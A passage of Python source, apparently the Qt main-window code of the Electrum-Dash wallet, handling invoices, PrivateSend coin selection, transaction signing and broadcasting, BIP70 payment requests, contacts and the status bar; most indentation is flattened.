def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
try:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
except InvoiceError as e:
self.show_error(_('Error creating payment') + ':\n' + str(e))
def read_invoice_ext(self):
if not self.pending_invoice:
return
w = self.wallet
_id = self.pending_invoice.id
is_ps = self.ps_cb.isChecked()
tx_type, extra_payload = self.extra_payload.get_extra_data()
extra_payload = '' if not extra_payload else extra_payload.to_hex_str()
invoice_ext = w.create_invoice_ext(_id, is_ps=is_ps, tx_type=tx_type,
extra_payload=extra_payload)
return invoice_ext
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
self.pending_invoice_ext = self.read_invoice_ext()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
_id = self.pending_invoice.id
self.wallet.save_invoice_ext(_id, self.pending_invoice_ext)
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
self.pending_invoice_ext = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
self.pending_invoice_ext = self.read_invoice_ext()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice, self.pending_invoice_ext)
def pay_multiple_invoices(self, invoices):
outputs = []
invoices_ext = []
for invoice in invoices:
outputs += invoice.outputs
invoices_ext.append(self.wallet.get_invoice_ext(invoice.id))
if any([i.is_ps for i in invoices_ext]):
raise Exception('Cannot do batch payment with'
' PrivateSend options on invoices')
if any([(i.tx_type or i.extra_payload) for i in invoices_ext]):
raise Exception('Cannot do batch payment with DIP2'
' tx type/extra payload on invoices')
self.pay_onchain_dialog(self.get_coins(min_rounds=None), outputs,
is_ps=False, tx_type=0, extra_payload=b'')
def do_pay_invoice(self, invoice: 'Invoice',
invoice_ext: 'InvoiceExt' = None):
if invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
psman = self.wallet.psman
if invoice_ext is None:
_id = invoice.id
invoice_ext = self.wallet.get_invoice_ext(_id)
is_ps = invoice_ext.is_ps
min_rounds = psman.mix_rounds if is_ps else None
tx_type = invoice_ext.tx_type
extra_payload = invoice_ext.extra_payload
extra_payload = ProTxBase.from_hex_str(tx_type, extra_payload)
self.pay_onchain_dialog(self.get_coins(min_rounds=min_rounds),
invoice.outputs, is_ps=is_ps,
tx_type=tx_type,
extra_payload=extra_payload)
else:
raise Exception('unknown invoice type')
def hide_extra_payload(self):
self.extra_payload.hide()
self.extra_payload_label.hide()
def show_extra_payload(self):
self.extra_payload.show()
self.extra_payload_label.show()
def on_ps_cb(self, is_ps):
if self.max_button.isChecked():
self.spend_max()
self.update_available_amount()
if is_ps:
w = self.wallet
psman = w.psman
if not psman.enabled and psman.is_hw_ks:
self.show_warning(_('It is not recommended to send a PrivateSend'
' transaction without the PS Keystore,'
' as there is no means to verify'
' input coins'))
denoms_by_vals = psman.calc_denoms_by_values()
if denoms_by_vals:
if not psman.check_enough_sm_denoms(denoms_by_vals):
psman.postpone_notification('ps-not-enough-sm-denoms',
w, denoms_by_vals)
def reset_privatesend(self):
coins = self.get_manually_selected_coins()
if coins is not None:
self.set_ps_cb_from_coins(coins)
else:
self.ps_cb.setChecked(False)
self.update_available_amount()
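    # Recompute the "available amount" shown on the send tab by building a
    # dummy spend-max transaction to a throwaway wallet address with the
    # current PrivateSend / DIP2 settings and reading its output value.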
def update_available_amount(self, nonlocal_only=False):
if self.tabs.currentIndex() != self.tabs.indexOf(self.send_tab):
return
wallet = self.wallet
psman = wallet.psman
is_ps = self.ps_cb.isChecked()
min_rounds = None if not is_ps else psman.mix_rounds
no_ps_data = psman.is_hw_ks and not psman.enabled
tx_type, extra_payload = self.extra_payload.get_extra_data()
inputs = self.get_coins(nonlocal_only=nonlocal_only,
min_rounds=min_rounds)
if inputs:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
try:
tx = wallet.make_unsigned_transaction(coins=inputs,
outputs=outputs,
no_ps_data=no_ps_data,
min_rounds=min_rounds,
tx_type=tx_type,
extra_payload=extra_payload)
amount = tx.output_value()
extra_fee = run_hook('get_tx_extra_fee', wallet, tx)
if extra_fee:
amount -= extra_fee[1]
except Exception:
amount = 0
else:
amount = 0
self.av_amnt.setAmount(amount)
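    # Sync the PrivateSend checkbox with manually selected coins: check it only
    # when every selected coin is a PrivateSend denom mixed to at least the
    # configured number of rounds, otherwise uncheck it and refresh the
    # available amount.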
def set_ps_cb_from_coins(self, coins):
is_ps = self.ps_cb.isChecked()
use_regular_coins = False
use_ps_coins = False
min_ps_rounds = 1e9
if not coins:
if is_ps:
self.ps_cb.setChecked(False)
self.update_available_amount()
if self.max_button.isChecked():
self.spend_max()
return
for item in list(coins):
ps = item.ps_rounds
if ps is None:
use_regular_coins = True
else:
use_ps_coins = True
min_ps_rounds = min(ps, min_ps_rounds)
if (use_ps_coins and not use_regular_coins
and min_ps_rounds >= self.wallet.psman.mix_rounds):
if not is_ps:
self.ps_cb.setChecked(True)
else:
if is_ps:
self.ps_cb.setChecked(False)
self.update_available_amount()
if self.max_button.isChecked():
self.spend_max()
def get_coins(self, *, nonlocal_only=False,
min_rounds=None) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
include_ps = (min_rounds is None)
psman = self.wallet.psman
main_ks = psman.ps_keystore and psman.is_hw_ks
no_ps_data = psman.is_hw_ks and not psman.enabled
return self.wallet.get_spendable_coins(None,
nonlocal_only=nonlocal_only,
include_ps=include_ps,
min_rounds=min_rounds,
no_ps_data=no_ps_data,
main_ks=main_ks)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
text = _("Not enough funds")
frozen_str = self.get_frozen_balance_str()
if frozen_str:
text += " ({} {})".format(
frozen_str, _("are frozen")
)
return text
def get_frozen_balance_str(self) -> Optional[str]:
frozen_bal = sum(self.wallet.get_frozen_balance())
if not frozen_bal:
return None
return self.format_amount_and_units(frozen_bal)
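    # On-chain payment entry point: run the 'abort_send' hook, derive the
    # PrivateSend round requirement, and hand a deferred make_tx closure to
    # ConfirmTxDialog, which is then updated on a background thread.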
def pay_onchain_dialog(self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None, is_ps=False,
tx_type=0, extra_payload=b'') -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
psman = self.wallet.psman
min_rounds = None if not is_ps else psman.mix_rounds
no_ps_data = psman.is_hw_ks and not psman.enabled
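        # make_tx builds the unsigned transaction for the confirm dialog; DIP2
        # special transactions get their extra payload validated once the tx
        # has been prepared.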
def make_tx(fee_est):
tx = self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=False,
min_rounds=min_rounds, no_ps_data=no_ps_data,
tx_type=tx_type, extra_payload=extra_payload)
if tx.tx_type:
try:
tx.extra_payload.check_after_tx_prepared(tx)
except DashTxError as e:
self.show_message(str(e))
return
return tx
output_values = [x.value for x in outputs]
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
output_value = '!' if '!' in output_values else sum(output_values)
conf_dlg = ConfirmTxDialog(window=self, make_tx=make_tx,
output_value=output_value,
is_sweep=is_sweep, is_ps_tx=is_ps)
conf_dlg.bg_update(
lambda x: self._conf_dlg_after_bg_update(conf_dlg,
external_keypairs))
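    # Ledger devices can become very slow when signing transactions with many
    # inputs; warn when the input count exceeds a threshold that shrinks as
    # the hardware keystore holds more UTXOs.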
def _check_hw_wallets_txin_cnt(self, conf_dlg):
keystore = self.wallet.db.get('keystore')
ks_type = keystore.get('type', 'unknown') if keystore else 'unknown'
hw_type = keystore.get('hw_type', 'unknown') if keystore else 'unknown'
if not ks_type == 'hardware' or not hw_type == 'ledger':
return True
ks_utxo_cnt = len([c for c in self.wallet.get_utxos()
if not c.is_ps_ks])
hw_txin_cnt = len([c for c in conf_dlg.tx.inputs()
if not c.is_ps_ks])
need_warn = False
if ks_utxo_cnt <= 100:
if hw_txin_cnt > 10:
need_warn = True
elif ks_utxo_cnt <= 200:
if hw_txin_cnt > 5:
need_warn = True
elif ks_utxo_cnt <= 300:
if hw_txin_cnt > 3:
need_warn = True
elif hw_txin_cnt > 1:
need_warn = True
if not need_warn:
return True
cb = QCheckBox(_("Don't show this again."))
def on_cb(x):
self.config.set_key('hw_no_lags_warn', True, True)
cb.stateChanged.connect(on_cb)
msg = '\n'.join([
_('Warning') + ':',
            _('You have a large number of UTXOs on your HW device.'),
            _('Total number of HW UTXOs: {}.').format(ks_utxo_cnt),
            _('Number of transaction inputs from the HW device: {}.').format(hw_txin_cnt),
            _('You may encounter significant lag in the HW device response.'),
            '',
            _('If this happens, try to spend coins partially'
              ' by enabling the "Coins" tab from the "View" main menu'
              ' and selecting the coins to spend.'),
            '',
            _('Another thing to try is to temporarily disable timeouts'
              ' on the device. (Security -> [PIN lock, Screen saver])'),
'',
_('Do you want to continue with this number of inputs?')
])
return self.question(msg, checkbox=cb)
def _conf_dlg_after_bg_update(self, conf_dlg, external_keypairs):
conf_dlg.update()
hw_no_lags_warn = self.config.get('hw_no_lags_warn', False)
if not hw_no_lags_warn:
if not self._check_hw_wallets_txin_cnt(conf_dlg):
return
if conf_dlg.not_enough_funds:
self._on_conf_dlg_not_enough_funds(conf_dlg, external_keypairs)
else:
self._conf_dlg_or_preview_dlg(conf_dlg, external_keypairs)
def _on_conf_dlg_not_enough_funds(self, conf_dlg, external_keypairs):
def enough_funds_cb(can_continue):
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if can_continue:
self._conf_dlg_or_preview_dlg(conf_dlg, external_keypairs)
else:
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_message(text)
conf_dlg.bg_check_have_enough_funds_assuming_zero_fees(enough_funds_cb)
def _conf_dlg_or_preview_dlg(self, conf_dlg, external_keypairs):
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
preview_dlg = PreviewTxDialog(
window=self,
make_tx=conf_dlg.make_tx,
external_keypairs=external_keypairs,
output_value=conf_dlg.output_value,
is_ps_tx=conf_dlg.is_ps_tx)
preview_dlg.bg_update(lambda x: preview_dlg.update_and_show())
return
cancelled, is_send, password, tx = conf_dlg.run()
if cancelled:
return
if tx.tx_type:
try:
tx.extra_payload.check_after_tx_prepared(tx)
except DashTxError as e:
self.show_message(str(e))
return
if is_send:
pr = self.payment_request
self.save_pending_invoice()
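            # sign on a background thread with the wallet password (or external
            # keypairs) and broadcast, or show the tx, once signing succeeds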
def sign_done(success):
if success:
self.broadcast_or_show(tx, pr)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
preview_dlg = PreviewTxDialog(
window=self,
make_tx=conf_dlg.make_tx,
external_keypairs=external_keypairs,
output_value=conf_dlg.output_value,
is_ps_tx=conf_dlg.is_ps_tx)
preview_dlg.bg_update(lambda x: preview_dlg.update_and_show())
def broadcast_or_show(self, tx: Transaction,
pr: Optional[paymentrequest.PaymentRequest]):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx, pr)
@protected
@ps_ks_protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def create_small_denoms(self, denoms_by_vals, parent):
w = self.wallet
psman = w.psman
coins = psman.get_biggest_denoms_by_min_round()
        if not coins:
            msg = psman.create_sm_denoms_data(no_denoms_txt=True)
            parent.show_error(msg)
            return
        self.create_new_denoms(coins[0:1], parent)
def confirm_wfl_transactions(self, info, parent):
q = _('Do you want to create transactions?\n\n{}').format(info)
return parent.question(q)
def create_new_denoms(self, coins, parent):
w = self.wallet
psman = w.psman
info = psman.new_denoms_from_coins_info(coins)
if self.confirm_wfl_transactions(info, parent):
res = self.create_new_denoms_wfl_from_gui(coins, mwin=self,
parent=parent)
if res:
wfl, err = res
if err:
parent.show_error(err)
else:
parent.show_message(f'Created New Denoms workflow with'
f' txids: {", ".join(wfl.tx_order)}')
@protected_with_parent
def create_new_denoms_wfl_from_gui(self, coins, parent, password):
psman = self.wallet.psman
return psman.create_new_denoms_wfl_from_gui(coins, password)
def create_new_collateral(self, coins, parent):
w = self.wallet
psman = w.psman
info = psman.new_collateral_from_coins_info(coins)
if self.confirm_wfl_transactions(info, parent):
res = self.create_new_collateral_wfl_from_gui(coins, mwin=self,
parent=parent)
if res:
wfl, err = res
if err:
parent.show_error(err)
else:
parent.show_message(f'Created New Collateral workflow with'
f' txids: {", ".join(wfl.tx_order)}')
@protected_with_parent
def create_new_collateral_wfl_from_gui(self, coins, parent, password):
psman = self.wallet.psman
return psman.create_new_collateral_wfl_from_gui(coins, password)
@protected_with_parent
def send_funds_to_main_ks(self, parent, password):
psman = self.wallet.psman
try:
tx_list = psman.prepare_funds_from_ps_keystore(password)
for tx in tx_list:
show_transaction(tx, parent=self)
except Exception as e:
self.show_error(f'{str(e)}')
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction,
pr: Optional[paymentrequest.PaymentRequest]):
        need_broadcast = bool(not pr or pr.need_broadcast_tx)
save_bef_send = self.config.get('save_tx_before_send', False)
err_msg_info = ''
if need_broadcast and save_bef_send:
self.wallet.add_transaction(tx)
self.need_update.set()
err_msg_info = '\n\n' + _('Transaction is saved to local history')
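        # broadcast through PSMan, or, for BIP70 requests that do not need
        # broadcasting, only send the bip70 Payment message and report the
        # ACK status back to the GUI thread.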
def broadcast_thread():
# non-GUI thread
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
txid = tx.txid()
try:
if need_broadcast:
coro = self.wallet.psman.broadcast_transaction(tx)
self.network.run_from_another_thread(coro)
else:
self.logger.info(f'Do not broadcast: {txid}, send bip70'
f' Payment msg to: {pr.payment_url}')
except TxBroadcastError as e:
err_msg = e.get_message_for_gui()
return False, f'{err_msg}{err_msg_info}'
except BestEffortRequestFailed as e:
err_msg = repr(e)
return False, f'{err_msg}{err_msg_info}'
# success
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
if not need_broadcast:
return ack_status, ack_msg
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
self.extra_payload.clear()
self.hide_extra_payload()
self.reset_privatesend()
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.extra_payload.clear()
self.hide_extra_payload()
self.reset_privatesend()
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.extra_payload.clear()
self.hide_extra_payload()
self.reset_privatesend()
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
utxos_str = {utxo.prevout.to_str() for utxo in utxos}
self.wallet.set_frozen_state_of_coins(utxos_str, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressModel, AddressList
self.address_model = AddressModel(self)
self.address_list = l = AddressList(self, self.address_model)
self.address_model.set_view(self.address_list)
l.setObjectName("addresses_container")
toolbar = l.create_toolbar(self.config)
tab = self.create_list_tab(l, toolbar)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', True))
l.show_toolbar(toolbar_shown)
return tab
def create_utxo_tab(self):
from .utxo_list import UTXOModel, UTXOList
self.utxo_model = UTXOModel(self)
self.utxo_list = l = UTXOList(self, self.utxo_model)
self.utxo_model.set_view(self.utxo_list)
l.setObjectName("utxo_container")
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_utxos', True))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
l.setObjectName("contacts_container")
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
invoice_ext = self.wallet.get_invoice_ext(invoice.id)
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
d.setMinimumWidth(650)
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
if invoice_ext.is_ps:
amount_str = '%s %s' % (amount_str, _('PrivateSend'))
grid.addWidget(QLabel(amount_str), 1, 1)
tx_type = invoice_ext.tx_type
type_str = SPEC_TX_NAMES[tx_type]
grid.addWidget(QLabel(_('Type') + ':'), 2, 0)
grid.addWidget(QLabel(type_str), 2, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.get_address()), 3, 1)
else:
            outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value) + ' ' + self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 3, 0)
grid.addWidget(QLabel(outputs_str), 3, 1)
grid.addWidget(QLabel(_("Description") + ':'), 4, 0)
grid.addWidget(QLabel(invoice.message), 4, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 5, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 5, 1)
extra_payload = invoice_ext.extra_payload
extra_payload = ProTxBase.from_hex_str(tx_type, extra_payload)
if tx_type and extra_payload:
epw = ExtraPayloadWidget(self)
epw.set_extra_data(tx_type, extra_payload)
grid.addWidget(epw, 6, 0, 1, -1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 7, 0)
grid.addWidget(QLabel(pr.get_requestor()), 7, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 8, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 8, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
                    f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console(parent=self)
console.setObjectName("console_container")
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum_dash,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(
config=self.config,
daemon=self.gui_object.daemon,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
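        # Expose each Commands method in the console namespace, bound to this
        # wallet and to the GUI password prompt.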
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setObjectName("main_window_balance")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog)
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog))
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog)
sb.addPermanentWidget(self.seed_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(
read_QIcon("status_disconnected.png"), _("Electrum Network"),
lambda: self.gui_object.show_network_dialog())
sb.addPermanentWidget(self.status_button)
def on_dash_net_status_button():
self.gui_object.show_dash_net_dialog()
self.dash_net_button = StatusBarButton(read_QIcon('dash_net_0.png'),
_('Dash Network'),
on_dash_net_status_button)
self.update_dash_net_status_btn()
sb.addPermanentWidget(self.dash_net_button)
self.ps_button = StatusBarButton(read_QIcon('privatesend.png'),
'',
lambda: show_ps_dialog_or_wizard(self))
self.update_ps_status_btn()
sb.addPermanentWidget(self.ps_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum_dash.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
self.console_tab.update_lock_state()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(800, 100)
vbox = QVBoxLayout()
